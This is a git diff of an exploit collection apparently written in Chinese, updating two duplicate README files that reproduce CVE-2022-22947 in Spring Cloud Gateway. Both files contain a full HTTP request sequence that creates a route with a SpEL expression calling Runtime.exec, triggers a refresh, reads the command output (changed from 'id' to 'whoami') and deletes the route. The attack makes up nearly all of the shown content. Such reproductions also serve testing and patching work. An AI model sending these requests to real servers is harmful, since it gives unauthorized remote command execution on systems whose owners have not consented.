diff --git a/00-CVE_EXP/CVE-2022-22947/README.md b/00-CVE_EXP/CVE-2022-22947/README.md
index ce6a71b..a7f4f8f 100644
--- a/00-CVE_EXP/CVE-2022-22947/README.md
+++ b/00-CVE_EXP/CVE-2022-22947/README.md
@@ -7,7 +7,7 @@ Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(
 [环境搭建过程](环境搭建)
-服务启动后,访问`http://your-ip:8080`即可看到演示页面,这个页面的上游就是example.com。
+服务启动后,访问`http://your-ip:9000`即可看到演示页面
 ## 漏洞复现
@@ -16,7 +16,7 @@ Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(
 ```
 POST /actuator/gateway/routes/hacktest HTTP/1.1
-Host: localhost:8080
+Host: localhost:9000
 Accept-Encoding: gzip, deflate
 Accept: */*
 Accept-Language: en
@@ -29,7 +29,7 @@ Content-Length: 328
 "id": "hacktest",
 "filters": [{
 "name": "AddResponseHeader",
- "args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"}
+ "args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}"}
 }],
 "uri": "http://example.com",
 "order": 0
@@ -41,7 +41,7 @@ Content-Length: 328
 ```
 POST /actuator/gateway/refresh HTTP/1.1
-Host: localhost:8080
+Host: localhost:9000
 Accept-Encoding: gzip, deflate
 Accept: */*
 Accept-Language: en
@@ -57,7 +57,7 @@ Content-Length: 0
 ```
 GET /actuator/gateway/routes/hacktest HTTP/1.1
-Host: localhost:8080
+Host: localhost:9000
 Accept-Encoding: gzip, deflate
 Accept: */*
 Accept-Language: en
@@ -73,7 +73,7 @@ Content-Length: 0
 ```
 DELETE /actuator/gateway/routes/hacktest HTTP/1.1
-Host: localhost:8080
+Host: localhost:9000
 Accept-Encoding: gzip, deflate
 Accept: */*
 Accept-Language: en
diff --git a/00-CVE_EXP/CVE-2022-22947/images/1.png b/00-CVE_EXP/CVE-2022-22947/images/1.png
index 4de5b54..889f96a 100644
Binary files a/00-CVE_EXP/CVE-2022-22947/images/1.png and b/00-CVE_EXP/CVE-2022-22947/images/1.png differ
diff --git a/00-CVE_EXP/CVE-2022-22947/images/2.png b/00-CVE_EXP/CVE-2022-22947/images/2.png
index 8a65046..f691493 100644
Binary files a/00-CVE_EXP/CVE-2022-22947/images/2.png and b/00-CVE_EXP/CVE-2022-22947/images/2.png differ
diff --git a/00-CVE_EXP/CVE-2022-22947/images/3.png b/00-CVE_EXP/CVE-2022-22947/images/3.png
index bfe7098..1283e9d 100644
Binary files a/00-CVE_EXP/CVE-2022-22947/images/3.png and b/00-CVE_EXP/CVE-2022-22947/images/3.png differ
diff --git a/00-CVE_EXP/CVE-2022-22947/images/4.png b/00-CVE_EXP/CVE-2022-22947/images/4.png
index da70ad8..3c846e3 100644
Binary files a/00-CVE_EXP/CVE-2022-22947/images/4.png and b/00-CVE_EXP/CVE-2022-22947/images/4.png differ
diff --git a/21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/README.md b/21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/README.md
index a594bbf..a7f4f8f 100644
--- a/21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/README.md
+++ b/21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/README.md
@@ -16,7 +16,7 @@ Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(
 ```
 POST /actuator/gateway/routes/hacktest HTTP/1.1
-Host: localhost:8080
+Host: localhost:9000
 Accept-Encoding: gzip, deflate
 Accept: */*
 Accept-Language: en
@@ -29,7 +29,7 @@ Content-Length: 328
 "id": "hacktest",
 "filters": [{
 "name": "AddResponseHeader",
- "args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"}
+ "args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}"}
 }],
 "uri": "http://example.com",
 "order": 0
@@ -41,7 +41,7 @@ Content-Length: 328
 ```
 POST /actuator/gateway/refresh HTTP/1.1
-Host: localhost:8080
+Host: localhost:9000
 Accept-Encoding: gzip, deflate
 Accept: */*
 Accept-Language: en
@@ -57,7 +57,7 @@ Content-Length: 0
 ```
 GET /actuator/gateway/routes/hacktest HTTP/1.1
-Host: localhost:8080
+Host: localhost:9000
 Accept-Encoding: gzip, deflate
 Accept: */*
 Accept-Language: en
@@ -73,7 +73,7 @@ Content-Length: 0
 ```
 DELETE /actuator/gateway/routes/hacktest HTTP/1.1
-Host: localhost:8080
+Host: localhost:9000
 Accept-Encoding: gzip, deflate
 Accept: */*
 Accept-Language: en
diff --git a/21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/images/1.png b/21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/images/1.png
index 4de5b54..889f96a 100644
Binary files a/21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/images/1.png and b/21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/images/1.png differ
diff --git a/21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/images/2.png b/21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/images/2.png
index 8a65046..f691493 100644
Binary files a/21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/images/2.png and b/21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/images/2.png differ
diff --git a/21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/images/3.png b/21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/images/3.png
index bfe7098..1283e9d 100644
Binary files a/21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/images/3.png and b/21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/images/3.png differ
diff --git a/21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/images/4.png b/21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/images/4.png
index da70ad8..3c846e3 100644
Binary files a/21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/images/4.png and b/21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/images/4.png differ